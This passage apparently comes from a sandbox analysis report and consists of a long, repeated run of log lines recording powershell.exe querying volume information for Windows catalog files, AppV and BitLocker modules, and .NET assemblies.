                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
